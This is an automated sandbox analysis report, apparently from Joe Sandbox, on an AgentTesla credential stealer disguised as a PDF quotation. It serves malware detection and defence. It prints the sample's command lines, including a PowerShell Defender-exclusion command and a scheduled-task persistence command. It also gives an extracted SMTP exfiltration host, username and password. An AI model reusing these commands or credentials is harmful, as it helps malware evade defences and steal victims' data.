
Windows Analysis Report
UN-Quotation 70000000187366444_PDF.exe

Overview

General Information

Sample Name: UN-Quotation 70000000187366444_PDF.exe
Analysis ID: 652379
MD5: 0bfb0ab1e8c7ec929e44d70c196b4d21
SHA1: 89c971ae9a832cdfe2e56e8adfe9972505059c2c
SHA256: cae7db67ae977f3f41349954ecedd51d0248924012fbcb33610e44ced5f24611
Tags: Agenttesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • UN-Quotation 70000000187366444_PDF.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe" MD5: 0BFB0AB1E8C7EC929E44D70C196B4D21)
    • powershell.exe (PID: 6608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6780 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
Malware Configuration (Agenttesla): {"Exfil Mode": "SMTP", "Username": "giedre@bonsa.lt", "Password": "201Bon@22", "Host": "mail.bonsa.lt"}
Source | Rule | Description | Author | Strings
0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author | Strings
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  • 0x32b1e:$s10: logins
  • 0x32585:$s11: credential
  • 0x2eb6e:$g1: get_Clipboard
  • 0x2eb7c:$g2: get_Keyboard
  • 0x2eb89:$g3: get_Password
  • 0x2fe80:$g4: get_CtrlKeyDown
  • 0x2fe90:$g5: get_ShiftKeyDown
  • 0x2fea1:$g6: get_AltKeyDown
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
No Sigma rule has matched

Snort IDS alerts

Source IP: 192.168.2.3
Destination IP: 193.46.84.142
Source Port: 49741
Destination Port: 587
SID: 2840032
Timestamp: 06/26/22-09:22:47.581294
Protocol: TCP
Classtype: A Network Trojan was detected

Source IP: 192.168.2.3
Destination IP: 193.46.84.142
Source Port: 49741
Destination Port: 587
SID: 2030171
Timestamp: 06/26/22-09:22:47.581243
Protocol: TCP
Classtype: A Network Trojan was detected

Source IP: 192.168.2.3
Destination IP: 193.46.84.142
Source Port: 49741
Destination Port: 587
SID: 2851779
Timestamp: 06/26/22-09:22:47.581294
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: UN-Quotation 70000000187366444_PDF.exe | Virustotal: Detection: 37%
Source: UN-Quotation 70000000187366444_PDF.exe | ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Roaming\XrgnLg.exe | ReversingLabs: Detection: 19%
Source: UN-Quotation 70000000187366444_PDF.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\XrgnLg.exe | Joe Sandbox ML: detected
Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "giedre@bonsa.lt", "Password": "201Bon@22", "Host": "mail.bonsa.lt"}
Source: UN-Quotation 70000000187366444_PDF.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: UN-Quotation 70000000187366444_PDF.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49741 -> 193.46.84.142:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49741 -> 193.46.84.142:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49741 -> 193.46.84.142:587
Source: global traffic | TCP traffic: 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: unknownDNS traffic detected: queries for: mail.bonsa.lt

                    System Summary

                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT, Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT, Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload, Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT, Author: ditekSHen
                    Source: initial sample | Static PE information: Filename: UN-Quotation 70000000187366444_PDF.exe
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.cs | Large array initialization: .cctor: array initializer size 11627
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.cs | Large array initialization: .cctor: array initializer size 11627
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.cs | Large array initialization: .cctor: array initializer size 11627
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.cs | Large array initialization: .cctor: array initializer size 11627
                    Source: UN-Quotation 70000000187366444_PDF.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCqhnAxCocASFEJkffVoTOfMxGoHZD.exe4 vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCqhnAxCocASFEJkffVoTOfMxGoHZD.exe4 vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTweenEngineAPI.dllD vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.295737787.0000000000318000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDisposit.exeF vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.304363401.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTweenEngineAPI.dllD vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCqhnAxCocASFEJkffVoTOfMxGoHZD.exe4 vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000000.294293276.0000000000AF8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDisposit.exeF vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.512249842.0000000000EF8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe | Binary or memory string: OriginalFilenameDisposit.exeF vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: XrgnLg.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: UN-Quotation 70000000187366444_PDF.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: XrgnLg.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UN-Quotation 70000000187366444_PDF.exe | Virustotal: Detection: 37%
                    Source: UN-Quotation 70000000187366444_PDF.exe | ReversingLabs: Detection: 19%
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File read: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe"
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File created: C:\Users\user\AppData\Roaming\XrgnLg.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File created: C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@12/11@1/1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: UN-Quotation 70000000187366444_PDF.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_01
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Mutant created: \Sessions\1\BaseNamedObjects\CidkzRETsJQhvv
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
                    Source: UN-Quotation 70000000187366444_PDF.exe, dP/Cb.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: UN-Quotation 70000000187366444_PDF.exe, dP/Cb.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: XrgnLg.exe.0.dr, dP/Cb.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: XrgnLg.exe.0.dr, dP/Cb.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.0.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: UN-Quotation 70000000187366444_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UN-Quotation 70000000187366444_PDF.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: UN-Quotation 70000000187366444_PDF.exe, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: XrgnLg.exe.0.dr, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.0.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.5.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.3.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.2.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.1.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.7.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.9.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.a60000.1.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.13.unpack, dP/Cb.cs | .Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 0_2_00B61C58 push ebx; iretd 0_2_00B61C7A
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_02D46890 push FFFFFF8Bh; iretd 10_2_02D4689B
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_06451518 push eax; retf 10_2_06451521
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_0649F69B push 8B000003h; iretd 10_2_0649F6A4
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_064932A8 push es; iretd 10_2_064941D0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_064932A8 push es; iretd 10_2_064941E0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_064918F6 push es; ret 10_2_06491910
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_064918AA push es; ret 10_2_064918C4
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_064918BD push es; ret 10_2_064918C4
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_06492177 push edi; retn 0000h 10_2_06492179
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_06491909 push es; ret 10_2_06491910
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_064941D9 push es; iretd 10_2_064941E0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_064941D1 push es; iretd 10_2_064941D8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_066283D8 push 8B05F474h; retn 518Dh 10_2_06628429
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_06620040 push es; ret 10_2_06620DC8
                    Source: initial sample | Static PE information: section name: .text entropy: 7.847857536771399
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | File created: C:\Users\user\AppData\Roaming\XrgnLg.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
